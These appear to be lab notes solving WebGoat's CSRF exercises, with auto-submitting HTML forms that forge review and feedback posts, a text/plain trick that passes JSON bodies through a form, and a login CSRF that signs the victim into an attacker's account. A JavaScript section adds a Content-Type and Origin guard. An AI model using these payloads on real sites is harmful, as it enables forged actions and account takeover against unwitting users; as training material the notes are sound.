Prepare a separate HTML file:
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://localhost:8080/WebGoat/csrf/basic-get-flag">
<input name="csrf" type="hidden" value="false">
<input type="submit" name="submit">
</form>


<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://localhost:8080/WebGoat/csrf/review">
<input type="hidden" id="reviewText" name="reviewText" placeholder="Add a Review" value="on behalf">
<input type="hidden" id="reviewStars" name="stars" value="1">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
<input type="submit" name="submit" value="Submit review">
</form>



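The requirement is to send JSON in the POST request; the original request is a form submission.

The main idea is to build the JSON string in the request body through a form submission; see https://pentestmonkey.net/blog/csrf-xml-post-request. With enctype="text/plain" the body is not URL-encoded, so the = sign between the field name and value ends up wrapped inside the JSON.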
<form name="feedback" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" method="POST">
<input type="hidden" name='{"name":"2","email":"2' value='2@2.com","subject":"service","message":"2"}'>
</form>
<script>document.feedback.submit();</script>
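
Added example (not part of the original notes and not WebGoat code): it reproduces the text/plain body produced by the form above, shows that it parses as JSON, and gives a server-side guard that rejects it. The names encodeTextPlain, forgedBody, checkJsonRequest and TRUSTED_ORIGINS are hypothetical, and the trusted origin and attacker.example are assumptions.

```javascript
// Added example, not WebGoat code. All names below are hypothetical.

// Browsers serialize an enctype="text/plain" form as name=value + CRLF per field,
// with no URL-encoding of quotes or braces.
function encodeTextPlain(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The hidden field from the notes above (constructed sample input).
function forgedBody() {
  return encodeTextPlain([
    ['{"name":"2","email":"2', '2@2.com","subject":"service","message":"2"}'],
  ]);
}

// Assumption: the application is served only from this origin.
const TRUSTED_ORIGINS = new Set(["http://localhost:8080"]);

// Guard for a JSON endpoint: an HTML form cannot send application/json
// cross-origin, so insisting on that media type refuses the forged POST before
// the body is parsed. The Origin check is a second, independent control.
function checkJsonRequest(headers) {
  const mediaType = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") return { ok: false, reason: "content-type" };
  const origin = headers["origin"];
  // Strict policy choice: a state-changing request without Origin is refused too.
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return { ok: false, reason: "origin" };
  return { ok: true, reason: null };
}

// A lenient parser accepts the forged body: the trailing CRLF is JSON whitespace
// and the "=" is just a character inside the email string.
const parsed = JSON.parse(forgedBody());
console.log(parsed.email);
console.log(checkJsonRequest({ "content-type": "text/plain", origin: "http://attacker.example" }));
console.log(checkJsonRequest({ "content-type": "application/json; charset=UTF-8", origin: "http://localhost:8080" }));
```
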

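The point here is to make the victim log in to the attacker's account, so that some of the victim's activity after login can be collected.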
<form name="login" action="http://localhost:8080/WebGoat/login" method="POST">
<input type="hidden" name='username' value='csrf-zqqqqq'>
<input type="hidden" name='password' value='123456'>
</form>
<script>document.login.submit();</script>
